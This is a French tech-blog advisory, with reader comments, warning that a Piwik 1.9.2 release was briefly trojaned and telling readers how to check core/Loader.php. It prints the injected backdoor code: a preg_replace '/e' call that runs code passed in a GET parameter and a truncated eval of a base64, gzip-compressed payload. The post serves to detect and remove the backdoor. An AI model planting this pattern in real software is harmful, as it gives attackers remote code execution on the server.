Entrez vos identifiants

x
OU
Vous avez oublié votre mot de passe ?
Utilisateur wiki : vous n'aviez pas d'email ?

Korben - Site d'actualité geek et tech

Go Top

Piwik – Attention à la backdoor

Piwik – Attention à la backdoor

Chers amis, attention si vous utilisez Piwik comme outil de stats sur votre serveur. En effet, si vous avez installé ou mis à jour vers la version 1.9.2 du 26 novembre entre 16h43 et 00h59 , il se peut que vous ayez installé une version de Piwik contenant une backdoor. Le pirate a profité d'un bug dans un plugin WordPress présent sur le serveur de Piwik pour placer son code dans les sources du projet.

Pour être certain que votre installation n'est pas piégée, ouvrez le fichier

core/Loader.php

et si vous ne voyez pas ce qui suit dedans, vous êtes tranquille.

<?php Error_Reporting(0);       if(isset($_GET['g']) && isset($_GET['s'])) {
preg_replace("/(.+)/e", $_GET['g'], 'dwm');     exit;
}
if (file_exists(dirname(__FILE__)."/lic.log")) exit;
eval(gzuncompress(base64_decode('eF6Fkl9LwzAUxb+KD0I3EOmabhCkD/
OhLWNOVrF/IlKatiIlnbIOZ/bpzb2pAyXRl7uF/s7JuffmMlrf3y7XD09OSWb
Uo9RzF6XzHCz3+0pOeDW0C79s2vqtaSdOTRKZOxfXDlmJOvp8LbzHwJle
/aIYEL0YWE$

Sinon, rendez-vous sur le blog de Piwik pour comprendre comment vous débarrasser de cette backdoor qui pourrait permettre à un pirate d'avoir accès à votre serveur.

Source


Facebook Twitter Email Copier Url

15 Responses to “Piwik – Attention à la backdoor”

  1. BigBouddha dit :

    Le code dépasse du cadre. Merci pour l’info. :)

  2. Nonox dit :

    Allez, un petit pre { word-wrap: break-word } et ce vilain texte qui dépasse du cadre est oublié ^^

  3. 2ShEp dit :

    Étonnamment ca ne marche pas sous FF17 (modif avec firebug)…

  4. Nonox dit :

    Pourtant c’est censé marcher depuis la 3.5 https://developer.mozilla.org/fr/docs/CSS/word-wrap

  5. amipb dit :

    Le code dépasse du cadre et “backdoor” se dit “porte dérobée”. Merci !

  6. CoKeTaLeS dit :

    Tu peux me traduire asshole ?

  7. Gérard dit :

    Trou d’cul ?

  8. Benjamin dit :

    Assez inquiétant comme problème. Pour le coup ça n’encourage pas à utiliser piwik.

  9. Sacha dit :

    Bonjour a tous,

    excusez moi pour ce commentaire HS mais je voulais dire que dans la collection des alternatives aux programme CAD, CAM, CAE, CAO, IAO, PLM …etc

    j’ai trouver Free CAD http://www.freecad.com/ qui me semble pas mal, mais désolé je n’ai pas pus tester a fond, il me semble être un complément a http://sourceforge.net/apps/mediawiki/free-cad/index.php
    http://fr.wikipedia.org/wiki/FreeCAD

    au plaisir

  10. Antispam dit :

    T’es pas grillé toi

  11. Sacha dit :

    Grillé ? pourquoi je comprend pas ? cela veut dire quoi ?

    et puis comme ma dit
    kate lieberg
    “Je te signale qu’il y a un forum pour cela !!!” http://korben.info/bon-plan-un-disque-ssd-de-240-go-sous-le-sapin.html#comment-722741082

    je suis désolé, je ne savais pas, j’essaie d’aider c’est tout.

  12. Pete dit :

    Quand même impressionnant que ça n’ait duré que 8 heures, ils sont taquets chez Piwik!

  13. Nono dit :

    Moi, ce que je trouve hallucinant, c’est qu’ils n’ont toujours pas donné le nom du plugin wordpress qui a permis l’intrusion… Je commence à douter de cette ‘excuse’ et du manque de transparence de l’équipe …
    C’est bien dommage.

La menace des failles 0-Day

capture-vjhj

"En avril 2014, les chercheurs en sécurité de Google sont tombé sur une vulnérabilité présente à l’intérieur de la bibliothèque cryptographique OpenSSL. Petit problème, OpenSSL est utilisé sur les 2/3 des sites web qui utilisent HTTPS mais aussi par les téléphones Android. Heartbleed était né."

Si comme moi vous êtes un passionné de sécurité informatique et que vous vous demandez qu'est-ce qu'un truc comme Heartbleed peut causer comme dommages, la lecture de cet article sur les failles 0-Day est pour vous...et je vous rassure je ne parle pas du dernier film Blackhat récemment vu au ciné ;)

Lire la suite

Vous avez aimé cet article ? Alors partagez-le avec vos amis en cliquant sur les boutons ci-dessous :

Twitter Facebook Google Plus Linkedin email
Rejoignez les 55278 korbenautes
et réveillez le bidouilleur qui est en vous
abonnez-vous en savoir plus
"Vous aimez bidouiller ?" Oui j'adore l'informatique et la technologie
Suivez Korben Un jour ça vous sauvera la vie.. Ou celle d'un(e) ami(e)
  • Rejoignez les 55278 bidouilleurs de la grande famille des Korbenautes
    «Je considère que votre email est aussi important que le mien.»
    Korben
  • Univers Populaires

  • Site hébergé par
    Agarik Sponsor Korben
  • Vidéos

  • DANS TON CHAT (BASHFR)

    Flo: elle m'a emmené voir "jackpot" au ciné
    Flo: il y a une blonde qui se pointe à 10 minutes de la fin du film, et qui s'installe
    Flo: et 5 minutes après y a un mec qui vient la chercher "psst on est dans la salle d'à coté"
    Flo: et elle de répondre "ah, je me disais aussi..."

    -- http://danstonchat.com/7282.html
  • Une astuce pour rendre

    Windows 10 plus rapide

    Si vous trouvez que Windows 10 est un peu lent, que vos applications ne se lancent pas très vite, que vos compilations prennent du temps, voici une petite astuce débusquée par Brominou pour accélérer le bouzin. Cliquez dans la zone de recherche de la barre Windows et tapez le mot clé...lire la suite

    Cryptool pour s'initier à la cryptographie

    Alors attention, ce n'est pas nouveau, mais je me suis dit que ce serait intéressant de vous en parler si vous ne connaissez pas encore. Cryptool est un logiciel open source éducatif qui va vous permettre de comprendre les principes de base de la cryptographie. Dans sa version 2, Cryptool intègre...lire la suite

    En ce moment dans l'univers "Windows"

    Voir tous les articles »